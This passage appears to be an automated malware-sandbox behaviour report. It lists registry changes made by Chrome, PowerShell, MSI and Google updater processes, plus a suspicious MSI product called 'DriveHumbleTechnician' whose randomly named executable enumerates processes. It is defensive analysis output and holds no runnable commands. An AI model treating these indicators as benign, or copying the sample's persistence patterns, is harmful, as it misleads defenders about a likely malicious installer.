Set value (str) \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings\neajdppkdcdipfabeoofebfddakdcjhd = "0AB8235BCF6CD735C78C38B85B74BEFD18914286EE2CB6C8038950115A0C23E6" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\BLBeacon\state = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\PreferenceMACs\Default\safebrowsing.incidents_sent = "11D90B4FA6AC8561C53193FDB47118B189FF07225839B8C273C101158536E52A" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Google\Chrome C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}\dr = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings\nmmhkkegccagdldgiimedpiccmgmieda = "15661F2A5350E33D1EC92EADAAB18D5963EE677331978A519CFDD7F840F1427B" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\PreferenceMACs\Default\homepage = "25EE4AF1A4E3E8B7C52843EE34DA8A06CFE7153CE3D50E41FADD45EFD8A82748" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Network C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings\JITDebug = "0" C:\Windows\System32\MsiExec.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Network\Location Awareness C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings\nkeimhogjdpnpccoofpliimaahmaaome = "2620DD8285D5404531C8A1B8468B85D0CDBC44620B60251D4E1DDF3505DB9341" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\BLBeacon C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\StabilityMetrics C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\UsageStatsInSample = "0" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133763974488585191" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Google\Update C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi = "258222BC21D8A8510EEFE793694EBBE376F3DA1D571ED72447E2E852F32792E9" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\System32\WScript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\BLBeacon C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}\lastrun = "13376397445619412" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Google\Chrome C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\PreferenceMACs\Default\google.services.account_id = "C9C65E4D3304587A839579821F12334783B12665EA41DD2C34F3D92FECCA9D86" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\PreferenceMACs\Default\session.startup_urls = "135559D901D1DD01CD7AECDCA2C80A955C7C514E1738F456157E182DF41FDEA9" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\System32\WScript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Google C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\PreferenceMACs\Default\prefs.preference_reset_time = "6C056523881962FA60C39DC586EC88672E3DBD75C7CEEB8D31E9A1D9E0BF85EE" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B16B5A0E-3B72-5223-8DF0-9117CD64DE77}\TypeLib\Version = "1.0" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F63F6F8B-ACD5-413C-A44B-0409136D26CB}\1.0\0\win32\ = "C:\\Program Files (x86)\\Google\\GoogleUpdater\\128.0.6597.0\\updater.exe\\6" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\TypeLib\Version = "1.0" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\TypeLib\{27634814-8E41-4C35-8577-980134A96544}\1.0\0 C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.webp\OpenWithProgids C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{ABC01078-F197-4B0B-ADBC-CFE684B39C82}\LocalService = "GoogleUpdaterService128.0.6597.0" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{ACAB122B-29C0-56A9-8145-AFA2F82A547C} C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{128C2DA6-2BC0-44C0-B3F6-4EC22E647964}\1.0\ = "GoogleUpdater TypeLib for IProcessLauncher" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{18D0F672-18B4-48E6-AD36-6E6BF01DBBC4}\TypeLib\ = "{18D0F672-18B4-48E6-AD36-6E6BF01DBBC4}" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\TypeLib\{8476CE12-AE1F-4198-805C-BA0F9B783F57}\1.0\0\win32 C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\TypeLib\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\1.0\0\win64 C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{CCA9FC90-B200-5641-99C0-7907756A93CF}\TypeLib\Version = "1.0" C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Interface\{F4334319-8210-469B-8262-DD03623FEB5B}\ProxyStubClsid32 C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6430040A-5EBD-4E63-A56F-C71D5990F827}\TypeLib\ = "{6430040A-5EBD-4E63-A56F-C71D5990F827}" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\TypeLib\{247954F9-9EDC-4E68-8CC3-150C2B89EADF}\1.0\0\win32 C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{1F1289FD-DD10-4579-81F6-1C59AAF2E1A9}\1.0\0\win32\ = "C:\\Program Files (x86)\\Google\\GoogleUpdater\\128.0.6597.0\\updater.exe\\6" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\TypeLib\{699F07AD-304C-5F71-A2DA-ABD765965B54}\1.0\0\win64 C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Interface\{0486745C-8D9B-5377-A54C-A61FFAA0BBE4}\TypeLib C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Interface\{D576ED7F-31DA-4EE1-98CE-1F882FB3047A} C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\TypeLib\{B685B009-DBC4-4F24-9542-A162C3793E77} C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{6430040A-5EBD-4E63-A56F-C71D5990F827}\1.0\ = "GoogleUpdater TypeLib for IProcessLauncher2System" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\TypeLib\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\1.0\0\win64 C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{8A4B5D74-8832-5170-AB03-2415833EC703}\1.0\0\win64\ = "C:\\Program Files (x86)\\Google\\GoogleUpdater\\128.0.6597.0\\updater.exe\\5" C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34527502-D3DB-4205-A69B-789B27EE0414}\1.0\0\win64\ = "C:\\Program Files (x86)\\Google\\GoogleUpdater\\128.0.6597.0\\updater.exe\\6" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\TypeLib\Version = "1.0" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\ChromePDF C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{8A4B5D74-8832-5170-AB03-2415833EC703} C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\GoogleUpdate.Update3WebMachine C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Interface\{1F1289FD-DD10-4579-81F6-1C59AAF2E1A9}\TypeLib C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\ProductName = "DriveHumbleTechnician" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Interface\{E9CD91E3-A00C-4B9E-BD63-7F34EB815D98}\TypeLib C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{4DC034A8-4BFC-4D43-9250-914163356BB0}\1.0\0\win32\ = "C:\\Program Files (x86)\\Google\\GoogleUpdater\\128.0.6597.0\\updater.exe\\6" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\TypeLib\Version = "1.0" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{699F07AD-304C-5F71-A2DA-ABD765965B54}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\TypeLib\{247954F9-9EDC-4E68-8CC3-150C2B89EADF} C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F4334319-8210-469B-8262-DD03623FEB5B}\TypeLib\Version = "1.0" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\TypeLib\{1588C1A8-27D9-563E-9641-8D20767FB258} C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{ACAB122B-29C0-56A9-8145-AFA2F82A547C}\ProxyStubClsid32 C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{463ABECF-410D-407F-8AF5-0DF35A005CC8}\ProxyStubClsid32 C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{534F5323-3569-4F42-919D-1E1CF93E5BF6}\LocalService = "GoogleUpdaterService128.0.6597.0" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{534F5323-3569-4F42-919D-1E1CF93E5BF6}\ProgID C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\ = "IAppVersionWeb" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{6430040A-5EBD-4E63-A56F-C71D5990F827}\1.0\0\win32\ = "C:\\Program Files (x86)\\Google\\GoogleUpdater\\128.0.6597.0\\updater.exe\\6" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\1.0\ = "GoogleUpdater TypeLib for IGoogleUpdate3Web" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{34527502-D3DB-4205-A69B-789B27EE0414}\TypeLib\ = "{34527502-D3DB-4205-A69B-789B27EE0414}" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{85AE4AE3-8530-516B-8BE4-A456BF2637D3}\1.0\ = "GoogleUpdater TypeLib for ICompleteStatusSystem" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Interface\{27634814-8E41-4C35-8577-980134A96544}\TypeLib C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E9CD91E3-A00C-4B9E-BD63-7F34EB815D98}\TypeLib\Version = "1.0" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D576ED7F-31DA-4EE1-98CE-1F882FB3047A}\ = "IAppWebSystem" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F966A529-43C6-4710-8FF4-0B456324C8F4}\1.0\0\win32\ = "C:\\Program Files (x86)\\Google\\GoogleUpdater\\128.0.6597.0\\updater.exe\\6" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\TypeLib\{4DC034A8-4BFC-4D43-9250-914163356BB0}\1.0\0\win64 C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\ChromeHTML\shell C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Interface\{CCA9FC90-B200-5641-99C0-7907756A93CF} C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{8018F647-BF07-55BB-82BE-A2D7049F7CE4} C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{18D0F672-18B4-48E6-AD36-6E6BF01DBBC4}\ProxyStubClsid32 C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{247954F9-9EDC-4E68-8CC3-150C2B89EADF}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.html\OpenWithProgIds\ChromeHTML C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\TypeLib\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\1.0\0 C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\TypeLib\{34527502-D3DB-4205-A69B-789B27EE0414}\1.0\0 C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\ChromeHTML\Application C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\msiexec.exe | N/A
N/A | N/A | C:\Windows\system32\msiexec.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe | N/A
N/A | N/A | C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe | N/A
N/A | N/A | C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe | N/A
N/A | N/A | C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe | N/A
N/A | N/A | C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe | N/A
N/A | N/A | C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe | N/A
